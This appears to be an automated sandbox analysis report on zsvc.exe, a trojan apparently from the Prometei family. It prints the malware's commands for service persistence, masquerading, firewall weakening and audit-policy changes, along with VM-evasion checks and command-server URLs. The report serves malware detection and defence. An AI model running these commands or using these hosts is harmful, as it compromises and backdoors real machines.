            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlay
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
            Source: unknownProcess created: C:\Windows\sqhost.exe c:\windows\sqhost.exe Dcomsvc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdog
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlay
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windowsJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlayJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLEJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignoreJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'Jump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= autoJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exeJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlayJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yesJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLEJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignoreJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config UPlugPlay start= autoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlayJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdogJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'Jump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enableJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get productJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get productJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enableJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: zsvc.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: C:\Users\user\Desktop\zsvc.exeCode function: 1_2_000000014128D5A0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_000000014128D5A0
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior:

            barindex
            Creates files in the system32 config directoryShow sources
            Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
            Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\zsvc.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\zsvc.exeJump to dropped file
            Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query UPlugPlay
            Source: C:\Users\user\Desktop\zsvc.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\sqhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Product FROM Win32_BaseBoard
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Product FROM Win32_BaseBoard
            Source: C:\Windows\sqhost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\sqhost.exeWindow / User API: threadDelayed 1043Jump to behavior
            Source: C:\Windows\sqhost.exe TID: 6340Thread sleep count: 107 > 30Jump to behavior
            Source: C:\Windows\sqhost.exe TID: 6340Thread sleep count: 246 > 30Jump to behavior
            Source: C:\Windows\sqhost.exe TID: 6340Thread sleep count: 56 > 30Jump to behavior
            Source: C:\Windows\sqhost.exe TID: 6340Thread sleep time: -56000s >= -30000sJump to behavior
            Source: C:\Windows\sqhost.exe TID: 6348Thread sleep count: 1043 > 30Jump to behavior
            Source: C:\Windows\sqhost.exe TID: 6348Thread sleep time: -52150000s >= -30000sJump to behavior
            Source: C:\Windows\sqhost.exe TID: 6348Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\sqhost.exeLast function: Thread delayed
            Source: C:\Windows\sqhost.exeLast function: Thread delayed
            Source: C:\Windows\sqhost.exeLast function: Thread delayed
            Source: C:\Windows\sqhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\sqhost.exeThread delayed: delay time: 50000Jump to behavior
            Source: C:\Windows\sqhost.exeThread delayed: delay time: 50000Jump to behavior
            Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
            Source: C:\Users\user\Desktop\zsvc.exeAPI call chain: ExitProcess graph end nodegraph_1-79
            Source: C:\Windows\sqhost.exeAPI call chain: ExitProcess graph end nodegraph_27-79
            Source: C:\Windows\sqhost.exeAPI call chain: ExitProcess graph end nodegraph_29-79
            Source: C:\Users\user\Desktop\zsvc.exeCode function: 1_2_000000014128D5A0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_000000014128D5A0
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windowsJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlayJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLEJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignoreJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'Jump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= autoJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exeJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlayJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yesJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLEJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignoreJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config UPlugPlay start= autoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlayJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start UPlugPlayJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'Jump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enableJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get productJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get productJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\sqhost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enableJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLEJump to behavior
            Source: C:\Windows\sqhost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\zsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Modifies the windows firewallShow sources
            Source: C:\Users\user\Desktop\zsvc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Uses netsh to modify the Windows network and firewall settingsShow sources
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Windows Service11Windows Service11Masquerading12OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection11Disable or Modify Tools2LSASS MemorySecurity Software Discovery111Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsService Execution1Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion21NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProxy1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery122Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 373955 Sample: zsvc.exe Startdate: 23/03/2021 Architecture: WINDOWS Score: 100 62 Multi AV Scanner detection for domain / URL 2->62 64 Multi AV Scanner detection for dropped file 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 5 other signatures 2->68 7 zsvc.exe 3 2 2->7         started        10 sqhost.exe 3 2->10         started        13 svchost.exe 1 2->13         started        process3 dnsIp4 72 Modifies the windows firewall 7->72 15 cmd.exe 3 7->15         started        19 cmd.exe 1 7->19         started        21 cmd.exe 1 7->21         started        29 6 other processes 7->29 56 p1.feefreepool.net 88.198.246.242, 49707, 49714, 80 HETZNER-ASDE Germany 10->56 23 cmd.exe 1 10->23         started        25 WMIC.exe 1 10->25         started        27 cmd.exe 1 10->27         started        31 2 other processes 10->31 signatures5 process6 file7 52 C:\Windows\zsvc.exe, PE32+ 15->52 dropped 54 C:\Windows\zsvc.exe:Zone.Identifier, ASCII 15->54 dropped 58 Uses netsh to modify the Windows network and firewall settings 15->58 33 conhost.exe 15->33         started        35 netsh.exe 3 19->35         started        44 2 other processes 19->44 46 3 other processes 21->46 37 netsh.exe 3 23->37         started        40 conhost.exe 23->40         started        60 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 25->60 42 conhost.exe 25->42         started        48 2 other processes 27->48 50 11 other processes 29->50 signatures8 process9 signatures10 70 Creates files in the system32 config directory 37->70

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            zsvc.exe70%VirustotalBrowse
            zsvc.exe68%ReversingLabsWin64.Trojan.Phonzy
            zsvc.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\zsvc.exe100%Joe Sandbox ML
            C:\Windows\zsvc.exe68%ReversingLabsWin64.Trojan.Phonzy

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            p1.feefreepool.net9%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb0%Avira URL Cloudsafe
            https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier0%Avira URL Cloudsafe
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW0%Avira URL Cloudsafe
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710%Avira URL Cloudsafe
            http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj0%Avira URL Cloudsafe
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
            http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q527100030%Avira URL Cloudsafe
